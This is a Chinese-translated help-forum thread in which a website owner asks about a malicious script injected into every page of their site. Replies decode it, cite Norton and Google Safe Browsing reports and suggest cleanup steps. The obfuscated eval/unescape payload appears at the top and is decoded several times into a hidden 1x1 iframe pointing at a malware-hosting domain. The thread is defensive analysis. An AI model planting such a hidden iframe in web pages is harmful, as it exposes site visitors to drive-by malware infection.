<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>
我的网站 www.safwanmanpower.com 在每个页面中都受到恶意软件脚本的攻击我不知道这个脚本是关于任何人都可以知道这个脚本如何使我的网站恶意软件受到影响?
希望得到快速和积极的回应。
已编辑
sumone 如何在未经上传许可的情况下攻击我的网站?
您的网站已被已知实体入侵。您的页面现在正在向您的访问者提供漏洞利用,并使他们处于危险之中。
立即关闭您的网站并参考:http ://safeweb.norton.com/report/show?name=sedpoo.com
威胁报告 发现的威胁总数:4 路过下载(这是什么?) 发现威胁:3 以下是完整列表:(有关特定威胁的更多信息,请单击 在下面的威胁名称上) 威胁名称:HTTP 恶意工具包变体活动 15 地点:http://sedpoo.com/?687328 威胁名称:HTTP 恶意工具包变体活动 15 地点:http://sedpoo.com/?-560137484 威胁名称:HTTP 恶意工具包变体活动 15 地点:http://sedpoo.com/?2443640 病毒(这是什么?) 发现的威胁:1 以下是完整列表:(有关特定威胁的更多信息,请单击 在下面的威胁名称上) 威胁名称:Trojan.Gen 位置:http://sedpoo.com/des.jar
并且:http ://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/
sedpoo.com 目前的上市状态是什么? 站点被列为可疑站点 - 访问此站点可能会损害您的计算机。 Google 访问该网站时发生了什么? 在过去 90 天内我们在网站上测试的 1887 个页面中,有 0 个页面 导致恶意软件在没有用户的情况下被下载和安装 同意。谷歌最后一次访问这个网站是在 2011-01-18,并且 上次在此站点上发现可疑内容是在 2011-01-18。 恶意软件包括 2478 个漏洞利用、2135 个木马、1508 个脚本 漏洞利用。 该站点托管在 8 个网络上,包括 AS4766(韩国电信), AS51306 (UAIP)、AS5610 (捷克)。 该网站是否作为中介导致进一步分发 恶意软件? 在过去的 90 天里,sedpoo.com 似乎充当了中介 用于感染 962 个站点,包括 feja-islame.com/、yaris-club.net/、 cstbilisi.ge/. 此网站托管恶意软件? 是的,该站点在过去 90 天内托管了恶意软件。它 受感染的 2519 个域,包括 yaris-club.net/、feja-islame.com/、 bhiee.net/。 这怎么发生的? 在某些情况下,第三方可以向合法网站添加恶意代码, 这将导致我们显示警告消息。
在您进一步研究威胁并准备好应对可能发生的潜在感染之前,我不会访问 sedpoo 攻击站点。启动虚拟机来访问该站点是一种快速进一步调查的方法,而不会损害您的工作站和数据。
未转义的代码是这样的:
document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')
评估它将向您的网站添加一个 1px x 1px iframe,它指向上述地址。
您应该使用smscanner(Simple Server Malware Scanner),它将扫描受感染的文件、脚本、混淆的 javascript 代码、shell 等。到目前为止,它适用于 linux Web 服务器
删除空格时,它会解码为:
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
在 chrome 上,它转义为"document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')", chrome 告诉我这是一个托管恶意软件的网站。
未转义的代码是:
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
哪个正在为http://sedpoo.com/?338375创建一个 iFrame ,我假设它会生成用于广告等的弹出窗口
如果您想查看该代码的作用,请将转义代码粘贴到此 URL(我已经完成,它似乎正在尝试将您的站点重定向到另一个链接): http ://www.linkedresources.com/tools /unescaper_v0.2b1.html
您是否在您的网站上使用某种内容管理系统 (CMS)?如果是这样,您可以做的最好的事情是访问该 CMS 的网站并下载最新版本。
使用此处的工具取消转义代码以获取此信息
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
它将一个 1px x 1px(实际上不可见)的 iframe 嵌入到您的页面中,从这里它最有可能通过漏洞攻击您的访问者或只是试图产生广告窗口
这是反混淆的 JavaScript 代码:
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
我将回答直接的问题:向每个页面注入脚本意味着黑客控制了网络服务器,可能控制了整个主机网络场。
如何?也许他偷了管理员密码。也许他在主机工作并使用他种植的后门。您无法真正知道,如果您被托管,您将无法真正保护自己,因为这是主持人的责任。
如果您被托管,请找到其他更可靠的主机。否则,按照 Cfreak 的评论,更改服务器上的所有密码,安装新的强大的防火墙等......
编辑:如果服务器是您的(即您不使用第 3 方主机),请检查安全事件日志并查看感染期间谁登录。显然,运行完整的病毒/恶意软件扫描。